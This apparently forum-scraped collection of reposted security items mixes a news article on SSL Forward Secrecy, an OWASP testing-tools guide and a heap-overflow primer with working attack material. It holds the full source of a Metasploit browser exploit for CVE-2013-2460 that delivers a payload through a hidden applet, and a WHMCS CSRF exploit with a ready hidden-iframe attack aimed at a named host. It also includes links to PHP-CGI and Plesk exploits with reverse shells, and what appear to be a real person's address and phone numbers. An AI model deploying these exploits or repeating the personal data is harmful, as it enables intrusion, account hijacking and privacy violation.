last week, based on documents leaked to the paper by former NSA contractor turned whistleblower Edward Snowden. The NSA also carries out deep packet inspection analysis of traffic passing through US fibre optic networks. Related revelations show that the NSA applies particular attention - and special rules - to encrypted communications, such as PGP-encrypted emails and SSL encrypted messages. Captured data should really be destroyed within five years, unless it consists of "communications that are enciphered or reasonably believed to contain secret meaning, and sufficient duration may consist of any period of time during which encrypted material is subject to, or of use in, cryptanalysis", according to the terms of a leaked Foreign Intelligence Surveillance Court order. The upshot is that intelligence agencies are collecting all the traffic they can physically capture before attempting to snoop upon encrypted content, where possible. These techniques are currently only practical for intelligence agencies but this may change over time - and those interested in protecting privacy need to act sooner rather than later, Ristic argues. "Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic," Ristic explains. "Eventually, they might obtain the key in one way or another - for example, by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances. At that point, they will be able to go back in time to decrypt everything." The Diffie–Hellman protocol offers an alternative algorithm to RSA for cryptographic key exchange. Diffie–Hellman is slower but generates more secure session keys that can't be recovered simply by knowing the server's private key, a protocol feature called Forward Secrecy. "Breaking strong session keys is clearly much more difficult than obtaining servers' private keys, especially if you can get them via a warrant," Ristic explains. "Furthermore, in order to decrypt all communication, now you can no longer compromise just one key - the server's - but you have to compromise the session keys belonging to every individual communication session." Someone with access to the server's private key can perform an active man-in-the-middle attack and impersonate the target server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic for later decryption. So, Forward Secrecy still creates a significant obstacle against industrial scale snooping. SSL supports Forward Secrecy using two algorithms: Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). The main obstacle to using Forward Secrecy has been that Diffie-Hellman is significantly slower, leading to a decision by many website operators to disable the feature in order to get better performance. "In recent years, we've seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys," Ristic explains, adding that ECDHE is bit faster than DHE but still slower than RSA. In addition, ECDHE algorithms are relatively new and not as widely supported in web server software packages. The vast majority of modern browsers support ECDHE. Website admins who add support for the encryption technique would help the majority of their privacy-conscious customers and adding DHE allows Forward Secrecy to be offered to the rest. A blog post by Ristic explains how to enable Forward Secrecy on SSL web servers, a well as providing a good explanation about the technology is beneficial for privacy - as well as noting the limitations of the technique. "Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions a powerful adversary could take," Ristic warns. "For example, they could convince the server operator to simply record all session keys." "Server-side session management mechanisms could also impact Forward Secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated. "In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated - possibly never in extreme cases. "Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise Forward Secrecy," Ristic concludes. Ristic founded SSL Labs, a research project to measure and track the effective security of SSL on the internet. He has over time worked with other security luminaries such as Taher Elgamal, one of the creators of the SSL protocol, and Moxie Marlinspike, creator of Convergence, to tackle SSL governance and implementation issues and promote best practice. Whether sysadmins switch to more privacy-friendly key exchange methods in spite of performance drawbacks is by no means sure, but publicising the issue at least gives them the chance to decide for themselves. ® Sursa: A simple SSL tweak could protect you from GCHQ/NSA snooping • The Register -
Java Applet ProviderSkeleton Insecure Invoke Method Authored by Adam Gowdiak, Matthias Kaiser | Site metasploit.com This Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) EXPLOIT_STRING = "Exploit" def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method', 'Description' => %q{ This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC 'Matthias Kaiser' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2460' ], [ 'OSVDB', '94346' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'], [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 18 2013' )) end def randomize_identifier_in_jar(jar, identifier) identifier_str = rand_text_alpha(identifier.length) jar.entries.each { |entry| entry.name.gsub!(identifier, identifier_str) entry.data = entry.data.gsub(identifier, identifier_str) } end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class") @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class") @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length) @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name) super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("ExpProvider.class", @provider_class) jar.add_file("DisableSecurityManagerAction.class", @action_class) randomize_identifier_in_jar(jar, "metasploit") randomize_identifier_in_jar(jar, "payload") jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html html = %Q| <html> <body> <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </body> </html> | return html end end Sursa: Java Applet ProviderSkeleton Insecure Invoke Method ? Packet Storm
-
PHP-CGI Argument Injection Authored by infodox Exploit for the PHP-CGI argument injection vulnerability disclosed in 2012. Has file uploading, inline shell spawning, and both python and perl reverse shell implementations using an earlier version of the "payload" library written for such exploits. Download: http://packetstormsecurity.com/files/download/122162/phpcgi.tar.gz Sursa: PHP-CGI Argument Injection ? Packet Storm
-
Plesk PHP Code Injection Authored by Kingcope, infodox Reliable exploit for the Plesk PHP code injection vulnerability disclosed by Kingcope in June 2013. Can deliver inline and reverse shells using the payloads library, as well as offering (buggy) file upload features. Download: http://packetstormsecurity.com/files/download/122163/plesk-php.tar.gz Sursa: Plesk PHP Code Injection ? Packet Storm
-
WHMCS Cross Site Request Forgery ########################################################################### # Exploit Title: WHMCS [CSRF] All Versions (0day) # Team: MaDLeeTs # Software Link: http://www.whmcs.com # Version: All # Site: http://www.MaDLeeTs.com # Email: LeeTHaXor@Y7Mail.com #######################Video####################################### http://vimeo.com/63686629 ########################################################################### https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768 ########################iFrame Code To Add On Deface############################## <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe> Example: <IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1=B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield%5B1%5D=max%40antswork.com&customfield%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&customfield%5B4%5D=%2B603.90578663&customfield%5B5%5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&customfield%5B7%5D=&customfield%5B8%5D=&customfield%5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel%3A+603.86560268+Fax%3A?+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe> ########################################################################### All you need to do is add it into your Deface page and make your target view the deface page, He MUST loggin 1st into his clientarea in order to get his email updated. ########################################################################### Greetz to : H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker | c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de | makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | | ThaRude | ThaDark | Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members ########################################################################### http://www.MaDLeeTs.com ########################################################################### Sursa: WHMCS Cross Site Request Forgery ? Packet Storm
-
Encryption At The Software Level: Linux And Windows Description: In this video Mark Stanislav From Due Security Discuss about Encryption for Linux and Farooq Ahmed Development Manager of Online Tech discuss encryption for Windows. Encryption Changing plain text into cipher text in order to make the original data unreadable to anyone not possessing knowledge of the decryption algorithm and any required key For More Information Please Visit : Compliant Cloud | Colocation | Managed Servers | Disaster Recovery Sursa: Encryption At The Software Level: Linux And Windows
-
Ssl Traffic Analysis Attacks - Vincent Berg Description: The talk will focus on modern SSL traffic analysis attacks. Although it has been known and great papers have been published about it most people still are not aware of the length an attacker can go through in order to extract useful information from the SSL sessions. By showing some large targets and some useful progress in that space it is hoped that the audience will gain a better understanding of what SSL traffic analysis is, that it is a real threat (depending on the skills of the assumed adversary), and some knowledge on how to try and avoid these type of attacks. There will be a bunch of research tools accompanying the talk with at least one being a proof of concept on how to do traffic analysis on Google Maps. For more information, please visit: :- Breakpoint 2012 Speakers List Sursa: Ssl Traffic Analysis Attacks - Vincent Berg
-
[h=1]OWASP Top Ten Testing and Tools for 2013[/h]Jonathan Lampe June 27, 2013 In 2013 OWASP completed its most recent regular three-year revision of the OWASP Top 10 Web Application Security Risks. The Top Ten list has been an important contributor to secure application development since 2004, and was further enshrined after it was included by reference in the in the Payment Card Industry Security Standards Council’s Data Security Standards, better known as the PCI-DSS. Surprisingly, there were only a few changes between the 2010 Top Ten and 2013 Top Ten lists, including one addition, several reorders and some renaming. The most prevalent theme was probably that both cross-site scripting (XSS) and cross-site request forgery (CSRF) dropped in importance: XSS dropping apparently because safer scripting libraries are becoming more widespread, and CSRF dropping because these vulnerabilities are not as common as once thought. In any case, the current entries in the OWASP Top Ten Web Application Security Risks for 2013 are: A1: Injection: Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. [*] A2: Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities. [*] A3: Cross-Site Scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. [*] A4: Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data. [*] A5: Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server and platform. All these settings should be defined, implemented and maintained as many are not shipped with secure defaults. This includes keeping all software up to date. [*] A6: Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, SSNs, tax IDs and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud or other crimes. Sensitive data deserves extra protection such as encryption at rest or encryption in transit, as well as special precautions when exchanged with the browser. [*] A7: Missing Function Level Access Control Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality. [*] A8: Cross-Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. [*] A9: Using Components with Known Vulnerabilities Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts. [*] A10: Unvalidated Redirects and Forwards Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing, malware sites or use forwards to access unauthorized pages. This is the fourth edition of a list that comes out every three years, and with the limited changes between 2010 and 2013 it is fair to say that OWASP’s popular Top Ten list has matured. With maturity and popularity, automation and utilities that directly address the items on the list have arrived, and some of the best are summarized in the chart below. [TABLE] [TR] [TD]WEB APPLICATION RISK[/TD] [TD]SECURITY UTILITY[/TD] [/TR] [TR] [TD]A1: Injection[/TD] [TD]SQL Inject Me and Zed Attack Proxy (ZAP)[/TD] [/TR] [TR] [TD]A2: Broken Authentication and Session Management[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A3: Cross-Site Scripting (XSS)[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A4: Insecure Direct Object References[/TD] [TD]HTTP Directory Traversal Scanner, Burp Suite and ZAP[/TD] [/TR] [TR] [TD]A5: Security Misconfiguration[/TD] [TD]OpenVAS and WATOBO[/TD] [/TR] [TR] [TD]A6: Sensitive Data Exposure[/TD] [TD]Qualys SSL Server Test[/TD] [/TR] [TR] [TD]A7: Missing Function Level Access Control[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A8: Cross-Site Request Forgery (CSRF)[/TD] [TD]Tamper Data (Samurai WTF), WebScarab or ZAP[/TD] [/TR] [TR] [TD]A9: Using Components with Known Vulnerabilities[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A10: Unvalidated Redirects and Forwards[/TD] [TD]ZAP[/TD] [/TR] [/TABLE] Those of you who read Russ McRee’s 2010 Top Ten security tools article will notice that most of the tools listed here were also identified in his 2010 survey. However, my approach differs from McRee’s in terms of breadth; whereas McRee aimed to provide a different tool for each of the top ten items, I aim to provide you with a smaller number of tools that should cover most of the top ten so you can concentrate your efforts on mastering fewer tools that do more. Along those lines, it is worth noting that several of my recommended tools, notably the Zed Attack Proxy (ZAP) and new entrant OpenVAS, have increased the breadth of their services to cover more Top Ten items since their original release. In fact, it may be worth taking a closer look at additional capabilities of any recommended tool on this list because many of these tools are still under active development. (For example, WATOBO now has a SQL injection probe, although I haven’t explored it far enough to recommend it yet.) [h=1]Two Main Types of Web Vulnerability Tools[/h] If you scan the chart you will notice that two tools are mentioned the most: OWASP’s Zed Attack Proxy (ZAP) and OpenVAS. These two tools represent two different classes of application scanning that every security researcher should familiarize his or herself with. First, there are the tools that look for common misconfigurations and outdated software, including default settings, sample content, insecure configurations, and old versions that harbor known vulnerabilities. These tools are represented in the chart above by OpenVAS, an open source project with several heavyweight sponsors including the government of Germany. Similar tools include Tenable’s Nessus and eEye’s Digital Security Retina, and perhaps about two dozen more actively development open source projects and commercial products. Second, there are the tools that help dig into specific web applications by automating SQL injection, authentication, session, XSS, directory traversal, redirect and other probes for common and serious vulnerabilities. These tools are represented in the chart above by ZAP. Most of these tools, including ZAP, use a combination of a local web proxy, web session recorder, web playback and thousands of variations on input manipulation to look for vulnerabilities. Similar tools include HP WebInspect, IBM AppScan (originally by WatchFire), dozens of other general-purpose web vulnerability scanners and hundreds of specific case utilities. [h=1]Other Web Vulnerability Tools[/h] In addition to these two main types of tools, most security practitioners will find themselves drawn to additional tools that allow them to dig further into certain classes of vulnerabilities. For example the “other tools” in my list were selected to cover areas where I worried about the thoroughness of my main tools, or where I wanted a second pair of eyes because of the risk. Your list of “other tools” will vary depending on the specific capabilities of your main tools, the needs of your clients or employer, your available operating systems and many other factors, but I selected mine for a few specific reasons. SQL Inject Me for #1 Injection – Although ZAP covers this, I selected a second tool to give me a second pair of eyes on this most common and deadly of vulnerabilities. (I never want to be caught with my pants down on OWASPs’ #1 vulnerability). HTTP Directory Traversal Scanner and Burp Suite for #4 Insecure Direct Object References – Although ZAP also covers this item, I like the breadth of scan and the output provided by either of these tools much more than ZAP’s breadth and output. WATOBO for #5 Security Misconfiguration – This is the highest-rated item that known vulnerability scanners like OpenVAS can detect. I wanted a second pair of eyes to make sure I am detecting more configuration issues, and to get a second opinion on questionable detects. Qualys SSL Server Test for #6 Sensitive Data Exposure – This could be my most controversial recommendation, but having dealt with the innards of SSL/TLS while developing several security products (including the FIPS 140 validation process with three different companies). I always feel like I have an incomplete picture of my SSL/TLS capabilities until I hit my app with Qualys’s SSL Server Test. None of the other local tests I’ve found (or written on my own) have quite the breadth of this hosted test. Tamper Data (Samurai WTF) and WebScarab for #8 Cross-Site Request Forgery (CSRF) – CSRF vulnerabilities can be surprisingly hard to pin down, because what often looks like a detect turns out to be false positive, and what looks like a clean access denial often really changes something interesting on the backend. To chase these vulnerabilities down (to the point where they are reproducible) you usually need to master a local web proxy that can help you manipulate specific fields. Two of the best are Tamper Data and WebScarab, and you will often find yourself switching to your favorite proxy after your main tool registers an initial detect. (Yes, I know ZAP is also a proxy, but it’s not my favorite proxy; it’s my favorite detector.) One other tool that web security practitioners should be familiar with is OWASP’s WebGoat package. This tool isn’t a scanner, probe or proxy: instead, WebGoat is an intentionally insecure web application that we can probe with these and other web security tools. [h=1]Specific Web Vulnerability Applications (Main Tools)[/h] [h=2]Deep Probe Into Specific Applications: OWASP’s Zed Attack Proxy (ZAP)[/h] (Probes for Cross-Site Scripting, Injection, Sessions, Directory Traversal, Unvalidated Redirects and Forwards, and acts as a web proxy to locate CSRF and similar vulnerabilities.) OWASP has recently sponsored the development of its own web application vulnerability scanner called the Zed Attack Proxy (or ZAP for short). It automatically spiders a target URL and looks for common vulnerabilities, especially issues with cookies, headers and cross-scripting. [h=3]Installing and Running Zed Attack Proxy[/h] Download and install the program from http://code.google.com/p/zaproxy/downloads/list Run the program from your Start menu When prompted, use the wizard to create an “SSL root certificate” Type in the URL of a target application in the “URL to attack” field on the “Quick Start” tab To avoid unwanted attention until you know what you’re doing, please stick to “http://localhost” URLs, such as your local copy of WebGoat Much of the power of ZAP comes from using it as an “inline” proxy rather than as an interactive application. To try this mode: Open “Tools | Options | Local proxy” and set the proxy port to an acceptable value (8080 is the default, but if you’re running multiple proxies and web applications on your local machine, things can get a little crowded). Open your web browser and set its proxy settings to “localhost” and port 8080 (or whatever you configured). Browse to a few sites in the web browser. Flip back to ZAP. Notice that the sites you visited (and a few referenced through advertisements and inclusions) are now listed in ZAP’s “Sites” list. Click the “History” tab in the lower half of ZAP. This will show the URLs that caused content to be added to ZAP’s “Sites” list. Once you have started to gather URLs in your sites list, you can expand, gather more information about or actively attack them. In the “Sites” tab, find a URL of a web page that you recognize on a site that you know has more content. Select it and then click the “play” icon on the “Spider” tab at the bottom of the screen to follow the links on the page. To look for SQL Injection or XSS vulnerabilities in a page, select the URL in the “Sites” tab and right-click it to list “Attack” options. To set your attack options (e.g. to just check for XSS and avoid SQL injection attacks), select “Analyse | Scan Policy…” to turn various tests on and off. [h=2]Bad Configuration and Old Software Scanner: OpenVAS[/h] (Probes for Security Misconfiguration, Missing Function Level Access Control, Using Components with Known Vulnerabilities.) I took my original formal security training in the late 1990s so I “grew up” on Nessus when it was still a free security scanning application. Since its switch to a commercial application, a handful of forks of the original Nessus code have carried on Nessus’s original promise of a free remote security scanner. My favorite alternative to Nessus these days is the OpenVAS project, which counts among its backers the national government of Germany. As noted in my chart above, this project is best at finding security misconfigurations, missing function level access controls (formerly known as “failure to restrict URL access”) and components with known vulnerabilities. It includes some SQL injection and other probes to test application input, but since it is mainly designed to scan networks for machines with bad configuration and outdated software, I think you should use it the same way. Installing and Running OpenVAS The OpenVAS software is available for several popular Linux distributions including CentOS, Fedora and Red Hat Enterprise Linux. It is also available on virtual appliances for Oracle VirtualBox and EMC VMware. Once installed, a web-based interface is available to guide you through the scanning process. You’ve likely seen the types of reports that this application generates before: rating findings by severity, and ranking multiple machines from least secure to most secure depending on the number and severity of findings on each machine. For more information, please see: http://www.openvas.org/ [h=1]Other Top Ten Web Application Vulnerabilities Utilities[/h] [h=2]Injection Utility: Security Compass’s SQL Inject Me[/h] Even if you have moved to Chrome or Safari for your daily web browsing, it’s hard to give up Firefox entirely because of its extensive library of add-ons. One of the best SQL injection tools available today is a Firefox add-on called “SQL Inject Me” from Security Compass. [h=3]Installing and Running SQL Inject Me[/h] Install and run the latest version of Firefox (I am currently using v20). Install the add on from: https://addons.mozilla.org/En-us/firefox/addon/sql-inject-me/ After installing the SQL Inject Me plug-in, follow these directions to use it: Navigate to the page or application you want to test. Right-click on the target page and select “Open SQL Inject Me Sidebar”. Once the side-bar is open, use the drop-down and buttons to perform specific attacks. [h=2]Advanced Web Proxy and CSRF Utility: OWASP WebScarab[/h] OWASP’s WebScarab is a Java-based web proxy that displays and allows you to manipulate the specific fields that are passed between browser and server. It is highly extensible, but you often need to know what you want to chase after and how to code to chase it with this tool. Further muddying this project is the fact that a “next generation” edition was started but has not been touched since 2011. For more information, please see: https://www.owasp.org/index.php/WebScarab_Getting_Started or https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project [h=2]Insecure Direct Object Reference Utility: Burp Suite[/h] In 2010, Russ McRee’s 2010 security tools article went into detail about how to use the Burp Suite to ferret out path and directory traversal issues. Path and directory traversal issues have been problematic for web servers and web applications since their inception, perhaps most famously in the 2000 IIS vulnerability that fed worms such as Nimda. Rather than repeat McRee’s work with Burp Suite, I will just agree that Burp Suite is good. For more information, please see: http://portswigger.net/burp/ [h=2]Insecure Direct Object Reference Utility: HTTP Directory Traversal Scanner[/h] Another tool that I like for directory traversal issues is the free HTTP Directory Traversal Scanner by John Leitch, an independent application security consultant in Michigan. This tool scans a given URL about ten thousand URL variants in an attempt to find a named file. It helpfully groups its results by return code and content, which makes it easy find needles in haystacks. For more information, please see: http://www.autosectools.com/Page/HTTP-Directory-Traversal-Scanner [h=2]Security Misconfiguration Utility: WATOBO[/h] Russ McRee’s 2010 security tools uses WATOBO to look for security misconfiguration issues and the tool is still a good choice: it’s open source and maintained by an active community. For more information, please see: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page [h=2]Sensitive Data Exposure Utility: Qualsys SSL Server Tester[/h] I normally avoid web-based tools for application scanning for several reasons: the data may not just be reported back to me, they might be pulled or changed at any time and they need to hit an Internet-facing application. However, I recommend Qualsys’s SSL Server Tester page to test the quality of your web application’s HTTPS connection before and after deployment into production. Qualsys tests for basic quality issues such as whether your server supports SSL 2.0, which ciphers are supported, and the strength of your server certificate. It also tests more advanced quality measures such as whether or not client-initiated renegotiation is allowed and whether or not the BEAST attack would be mitigated. For more information, please see: https://www.ssllabs.com/ssltest/index.html (This is a resource hosted by a third party. For maximum protection, only allow traffic from “ssllabs.com” to the target resource until the necessary issues are resolved.) [h=2]CSRF Utility: Tamper Data (Samurai WTF)[/h] A Tamper Data utility is available in the Samurai WTF collection and is part of Russ McRee’s coverage of CSRF utilities in his 2010 security tools review. The “Tamper Data” plug-in for Firefox is not currently recommended because of ongoing stability issues with recent versions of Firefox. Instead, I currently recommend configuring Firefox (or Chrome or any other web browser) to use a web proxy such as WebScarab or ZAP, and then use the functions within the web proxy to manipulate individual cookies, headers, form fields and URLs. [h=2]WebGoat: The Perfect Target[/h] In addition to the top ten web vulnerability list, OWASP develops and distributes software that allows students and security professionals to practice their skills against a deliberately insecure web application. The name of OWASP’s tilting dummy is “WebGoat,” and it is available in both .NET and Java editions. [h=3]How to Download, Install and Set Up WebGoat on Windows[/h] Although there is a .NET edition of WebGoat available for Windows platforms, I’ll stick with the Java edition in this article because the edition supports Linux and Mac OS platforms in addition to Windows. The Java edition also appears to be the more actively developed applications, as its official ambitions include growing into a security benchmarking platform and a honeypot. [h=3]WebGoat Prerequisites[/h] The Java edition of WebGoat requires Java, of course, and uses Tomcat to provide its web interface. Download and install Oracle Java from http://www.java.com Java Version 1.6 (a.k.a. “Java 6?) is recommended [*] Download and install Tomcat from http://tomcat.apache.org/ Tomcat Version 6 is recommended Tomcat Version 7 is supported but requires additional setup not documented here Once installed, open http://localhost:8080/ to confirm that Tomcat is working Once you confirm the service is working, stop the Tomcat service [h=3]How to Install WebGoat[/h] Download and unzip WebGoat from http://code.google.com/p/webgoat/downloads/list Download the “Zip” file and unpack the contents into a local folder [*] Open your local folder and double-click “webgoat.bat” A Java window labeled “Tomcat” will open and display messages Once the “Server startup in XXXXX ms” message appears, open http://localhost to confirm that you are hitting a live Tomcat application on port 80 Next, test WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted. [h=3]How to Run WebGoat[/h] Start WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted. Click the “Start WebGoat” button. Sursa: InfoSec Institute Resources – OWASP Top Ten Testing and Tools for 2013
-
[h=1]Heap Overflow: Vulnerability and Heap Internals Explained[/h]ViperEye June 26, 2013 1. Introduction A heap overflow is a form of buffer overflow; it happens when a chunk of memory is allocated to the heap and data is written to this memory without any bound checking being done on the data. This is can lead to overwriting some critical data structures in the heap such as the heap headers, or any heap-based data such as dynamic object pointers, which in turn can lead to overwriting the virtual function table. Here we’ll see some details about the inner working of the Windows heap, then move on to discuss how heap overflow vulnerability occurs. The paper will start with basic information on how Windows heap management is done and then move to understanding the vulnerability. 2. Windows Heap Basics Windows has two kinds of heap: Default heap Dynamic heap The default heap is used by the win32 subsystem to manage and allocate memory for local and global variables and local memory management functions [malloc()]. The dynamic heap is created by functions such as HeapCreate() that return a handle/address to a memory chunk that contains the heap header; the information in this header includes the segment table, virtual allocation list, free list usage bitmap, free list table, lookaside table, etc. This data is used by heap allocation functions such as HeapAlloc(), HeapReAlloc(), which allocates memory from this particular heap. As we can see from the above image, PEB stores the details of the heaps initialized in the system. This can be useful in enumerating heaps in the system. The above image shows the structure of the heap header. Next we will take a look at some of the important data structures in the heap that will help us understand the heap exploit better. [TABLE] [TR] [TD]..[/TD] [/TR] [TR] [TD]Segment List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Virtual Allocation List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Free List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Pointer to Lookaside List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [/TABLE] The condition where the heap is not used is when the allocation chunk is greater than 512KB (4096 bytes); in this case, the allocation is done in virtual memory by VirtualAlloc(). Let’s see how this happens: The above image shows how the heap allocation is done; certain constraints are verified before passing it forward. As we can see, all the calculation is done based on dividing by 8, the size of the allocated block is always divisible by 8, and we can also conclude from the code that there cannot exist a block of size 8 bytes because the header itself will amount to 16 bytes. Here’s the decision path during the heap allocation process: If block size is greater than 1024 bytes, go to step2. If it is less than 1024 bytes, check the lookaside list if there are no free entries check free list. If the above condition is true, then check whether the memory to be allocated is greater than 0xFE00 (512 KB). If the above condition is not true, then the memory is allocated from the free list. [*] If the above condition is true, then check whether the heap was created with a fixed size; if true, and then throw an error (STATUS_BUFFER_TOO_SMALL) 0xC0000023. If not true, use ntdll.ZwAllocateVirtualMemory to allocate new memory. Now’s let’s look at how heap memory is freed; memory is freed based on whether it is in the default heap or the dynamically allocated heap. If the buffer is in default heap then: Try to free lookaside list. Or coalesce buffer and place it on free list. If it is virtually allocated: Remove from busy list Or free it to OS. Free buffer to lookaside happens only if: There is a lookaside table Lookaside is not locked Requested size is smaller than 1024 (to fit the table) Lookaside 